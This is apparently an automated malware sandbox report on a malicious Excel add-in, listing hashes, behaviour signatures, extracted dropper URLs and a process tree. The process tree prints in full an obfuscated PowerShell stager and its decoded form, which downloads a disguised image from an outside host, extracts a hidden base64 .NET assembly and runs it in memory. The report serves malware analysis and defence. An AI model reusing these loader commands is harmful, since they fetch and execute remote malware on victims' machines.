Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    29/10/2023, 01:21

General

  • Target

    cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam

  • Size

    668KB

  • MD5

    41b8a5aadded29c7ef57e41bb0102152

  • SHA1

    ab78de829952f86e61f2fa351ce7bddf0c4a23bb

  • SHA256

    cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31

  • SHA512

    6d31fc6ce6de3ffc4cc84fe3207e10c52e5ef31986293442b0f9214dae4c914661e574b857958ff8ea290b4961b6e025a610f375bde144d47eb610bdaff487ba

  • SSDEEP

    12288:OK+e21N8IWOpr1Mu+VXSnuM95oOVPMX6Yyhf69cHhIAIY+2AmSMIHgJjAbDs2sd:O02f8+prO1VXk5oa564kTdZHCkYz

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg

exe.dropper

https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2892
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\yhgdrypl.js"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J�✘Bp�✘G0�✘YQBn�✘GU�✘VQBy�✘Gw�✘I�✘�✘9�✘C�✘�✘JwBo�✘HQ�✘d�✘Bw�✘HM�✘Og�✘v�✘C8�✘aQBt�✘GE�✘ZwBl�✘HU�✘c�✘Bs�✘G8�✘YQBk�✘C4�✘aQBv�✘C8�✘aQBi�✘C8�✘Ng�✘z�✘Go�✘cQ�✘1�✘Hk�✘b�✘BK�✘HI�✘dw�✘5�✘Es�✘e�✘BM�✘HE�✘Xw�✘x�✘DY�✘OQ�✘2�✘DY�✘M�✘�✘4�✘DE�✘MQ�✘w�✘C4�✘agBw�✘Gc�✘Jw�✘7�✘CQ�✘dwBl�✘GI�✘QwBs�✘Gk�✘ZQBu�✘HQ�✘I�✘�✘9�✘C�✘�✘TgBl�✘Hc�✘LQBP�✘GI�✘agBl�✘GM�✘d�✘�✘g�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘TgBl�✘HQ�✘LgBX�✘GU�✘YgBD�✘Gw�✘aQBl�✘G4�✘d�✘�✘7�✘CQ�✘aQBt�✘GE�✘ZwBl�✘EI�✘eQB0�✘GU�✘cw�✘g�✘D0�✘I�✘�✘k�✘Hc�✘ZQBi�✘EM�✘b�✘Bp�✘GU�✘bgB0�✘C4�✘R�✘Bv�✘Hc�✘bgBs�✘G8�✘YQBk�✘EQ�✘YQB0�✘GE�✘K�✘�✘k�✘Gk�✘bQBh�✘Gc�✘ZQBV�✘HI�✘b�✘�✘p�✘Ds�✘J�✘Bp�✘G0�✘YQBn�✘GU�✘V�✘Bl�✘Hg�✘d�✘�✘g�✘D0�✘I�✘Bb�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘V�✘Bl�✘Hg�✘d�✘�✘u�✘EU�✘bgBj�✘G8�✘Z�✘Bp�✘G4�✘ZwBd�✘Do�✘OgBV�✘FQ�✘Rg�✘4�✘C4�✘RwBl�✘HQ�✘UwB0�✘HI�✘aQBu�✘Gc�✘K�✘�✘k�✘Gk�✘bQBh�✘Gc�✘ZQBC�✘Hk�✘d�✘Bl�✘HM�✘KQ�✘7�✘CQ�✘cwB0�✘GE�✘cgB0�✘EY�✘b�✘Bh�✘Gc�✘I�✘�✘9�✘C�✘�✘Jw�✘8�✘Dw�✘QgBB�✘FM�✘RQ�✘2�✘DQ�✘XwBT�✘FQ�✘QQBS�✘FQ�✘Pg�✘+�✘Cc�✘Ow�✘k�✘GU�✘bgBk�✘EY�✘b�✘Bh�✘Gc�✘I�✘�✘9�✘C�✘�✘Jw�✘8�✘Dw�✘QgBB�✘FM�✘RQ�✘2�✘DQ�✘XwBF�✘E4�✘R�✘�✘+�✘D4�✘Jw�✘7�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘g�✘D0�✘I�✘�✘k�✘Gk�✘bQBh�✘Gc�✘ZQBU�✘GU�✘e�✘B0�✘C4�✘SQBu�✘GQ�✘ZQB4�✘E8�✘Zg�✘o�✘CQ�✘cwB0�✘GE�✘cgB0�✘EY�✘b�✘Bh�✘Gc�✘KQ�✘7�✘CQ�✘ZQBu�✘GQ�✘SQBu�✘GQ�✘ZQB4�✘C�✘�✘PQ�✘g�✘CQ�✘aQBt�✘GE�✘ZwBl�✘FQ�✘ZQB4�✘HQ�✘LgBJ�✘G4�✘Z�✘Bl�✘Hg�✘TwBm�✘Cg�✘J�✘Bl�✘G4�✘Z�✘BG�✘Gw�✘YQBn�✘Ck�✘Ow�✘k�✘HM�✘d�✘Bh�✘HI�✘d�✘BJ�✘G4�✘Z�✘Bl�✘Hg�✘I�✘�✘t�✘Gc�✘ZQ�✘g�✘D�✘�✘I�✘�✘t�✘GE�✘bgBk�✘C�✘�✘J�✘Bl�✘G4�✘Z�✘BJ�✘G4�✘Z�✘Bl�✘Hg�✘I�✘�✘t�✘Gc�✘d�✘�✘g�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘7�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘g�✘Cs�✘PQ�✘g�✘CQ�✘cwB0�✘GE�✘cgB0�✘EY�✘b�✘Bh�✘Gc�✘LgBM�✘GU�✘bgBn�✘HQ�✘a�✘�✘7�✘CQ�✘YgBh�✘HM�✘ZQ�✘2�✘DQ�✘T�✘Bl�✘G4�✘ZwB0�✘Gg�✘I�✘�✘9�✘C�✘�✘J�✘Bl�✘G4�✘Z�✘BJ�✘G4�✘Z�✘Bl�✘Hg�✘I�✘�✘t�✘C�✘�✘J�✘Bz�✘HQ�✘YQBy�✘HQ�✘SQBu�✘GQ�✘ZQB4�✘Ds�✘J�✘Bi�✘GE�✘cwBl�✘DY�✘N�✘BD�✘G8�✘bQBt�✘GE�✘bgBk�✘C�✘�✘PQ�✘g�✘CQ�✘aQBt�✘GE�✘ZwBl�✘FQ�✘ZQB4�✘HQ�✘LgBT�✘HU�✘YgBz�✘HQ�✘cgBp�✘G4�✘Zw�✘o�✘CQ�✘cwB0�✘GE�✘cgB0�✘Ek�✘bgBk�✘GU�✘e�✘�✘s�✘C�✘�✘J�✘Bi�✘GE�✘cwBl�✘DY�✘N�✘BM�✘GU�✘bgBn�✘HQ�✘a�✘�✘p�✘Ds�✘J�✘Bj�✘G8�✘bQBt�✘GE�✘bgBk�✘EI�✘eQB0�✘GU�✘cw�✘g�✘D0�✘I�✘Bb�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘QwBv�✘G4�✘dgBl�✘HI�✘d�✘Bd�✘Do�✘OgBG�✘HI�✘bwBt�✘EI�✘YQBz�✘GU�✘Ng�✘0�✘FM�✘d�✘By�✘Gk�✘bgBn�✘Cg�✘J�✘Bi�✘GE�✘cwBl�✘DY�✘N�✘BD�✘G8�✘bQBt�✘GE�✘bgBk�✘Ck�✘Ow�✘k�✘Gw�✘bwBh�✘GQ�✘ZQBk�✘EE�✘cwBz�✘GU�✘bQBi�✘Gw�✘eQ�✘g�✘D0�✘I�✘Bb�✘FM�✘eQBz�✘HQ�✘ZQBt�✘C4�✘UgBl�✘GY�✘b�✘Bl�✘GM�✘d�✘Bp�✘G8�✘bg�✘u�✘EE�✘cwBz�✘GU�✘bQBi�✘Gw�✘eQBd�✘Do�✘OgBM�✘G8�✘YQBk�✘Cg�✘J�✘Bj�✘G8�✘bQBt�✘GE�✘bgBk�✘EI�✘eQB0�✘GU�✘cw�✘p�✘Ds�✘J�✘B0�✘Hk�✘c�✘Bl�✘C�✘�✘PQ�✘g�✘CQ�✘b�✘Bv�✘GE�✘Z�✘Bl�✘GQ�✘QQBz�✘HM�✘ZQBt�✘GI�✘b�✘B5�✘C4�✘RwBl�✘HQ�✘V�✘B5�✘H�✘�✘ZQ�✘o�✘Cc�✘RgBp�✘GI�✘ZQBy�✘C4�✘S�✘Bv�✘G0�✘ZQ�✘n�✘Ck�✘Ow�✘k�✘G0�✘ZQB0�✘Gg�✘bwBk�✘C�✘�✘PQ�✘g�✘CQ�✘d�✘B5�✘H�✘�✘ZQ�✘u�✘Ec�✘ZQB0�✘E0�✘ZQB0�✘Gg�✘bwBk�✘Cg�✘JwBW�✘EE�✘SQ�✘n�✘Ck�✘LgBJ�✘G4�✘dgBv�✘Gs�✘ZQ�✘o�✘CQ�✘bgB1�✘Gw�✘b�✘�✘s�✘C�✘�✘WwBv�✘GI�✘agBl�✘GM�✘d�✘Bb�✘F0�✘XQ�✘g�✘Cg�✘JwB0�✘Hg�✘d�✘�✘u�✘G4�✘eQBt�✘C8�✘MQ�✘1�✘C4�✘Mw�✘z�✘C4�✘Mg�✘0�✘C4�✘Mw�✘5�✘DE�✘Lw�✘v�✘Do�✘c�✘B0�✘HQ�✘a�✘�✘n�✘C�✘�✘L�✘�✘g�✘Cc�✘Z�✘Bm�✘GQ�✘ZgBk�✘Cc�✘I�✘�✘s�✘C�✘�✘JwBk�✘GY�✘Z�✘Bm�✘Cc�✘I�✘�✘s�✘C�✘�✘JwBk�✘GY�✘Z�✘Bm�✘Cc�✘I�✘�✘s�✘C�✘�✘JwBk�✘GE�✘Z�✘Bz�✘GE�✘Jw�✘g�✘Cw�✘I�✘�✘n�✘GQ�✘ZQ�✘n�✘C�✘�✘L�✘�✘g�✘Cc�✘YwB1�✘Cc�✘KQ�✘p�✘�✘==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.repl"ace('�✘','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nym/15.33.24.391//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1480

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZATKV9CL2DTTDR4MNYLX.temp

    Filesize

    7KB

    MD5

    7f87960970e9e581c79a9c860df487f6

    SHA1

    33aff70c3cd824783848da0081641c8c473b3f63

    SHA256

    03dedcac47b0d218130b31b1fd6a53d0ade2003d72576771e0116eb358a849fe

    SHA512

    76694c321e13603005764e3828bdfe3bdcaf0b912eefda06d34c50c25441a0bd983df08c3ace938ef1e78fda1913e5e8511593b93b2b443f940465dc62ac3a93

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    7f87960970e9e581c79a9c860df487f6

    SHA1

    33aff70c3cd824783848da0081641c8c473b3f63

    SHA256

    03dedcac47b0d218130b31b1fd6a53d0ade2003d72576771e0116eb358a849fe

    SHA512

    76694c321e13603005764e3828bdfe3bdcaf0b912eefda06d34c50c25441a0bd983df08c3ace938ef1e78fda1913e5e8511593b93b2b443f940465dc62ac3a93

  • C:\Users\Admin\AppData\Roaming\yhgdrypl.js

    Filesize

    177KB

    MD5

    16ca1b3b70545723e278cef80dd40629

    SHA1

    decd934b39d051560d637b9727f56f9abd5e5491

    SHA256

    11aad61d002a805b706e90facdd0a047796c1f459705bd62a6bc7e67dbcd09a6

    SHA512

    dd2fba9fd39dad7a64566979fa58cc19b872a5119391b146d36fed300fe3fd6117f41b0a17bd60aadbb017b2053afcf673d29e2093270f44d1f5bcde29b8e49c

  • C:\Users\Admin\AppData\Roaming\yhgdrypl.js

    Filesize

    177KB

    MD5

    16ca1b3b70545723e278cef80dd40629

    SHA1

    decd934b39d051560d637b9727f56f9abd5e5491

    SHA256

    11aad61d002a805b706e90facdd0a047796c1f459705bd62a6bc7e67dbcd09a6

    SHA512

    dd2fba9fd39dad7a64566979fa58cc19b872a5119391b146d36fed300fe3fd6117f41b0a17bd60aadbb017b2053afcf673d29e2093270f44d1f5bcde29b8e49c

  • memory/1480-26-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/1480-24-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

  • memory/1480-23-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

  • memory/1480-22-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/1480-21-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-12-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-14-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

  • memory/2484-13-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

  • memory/2484-11-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-25-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-27-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2892-15-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB

  • memory/2892-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2892-1-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB

  • memory/2892-29-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2892-30-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB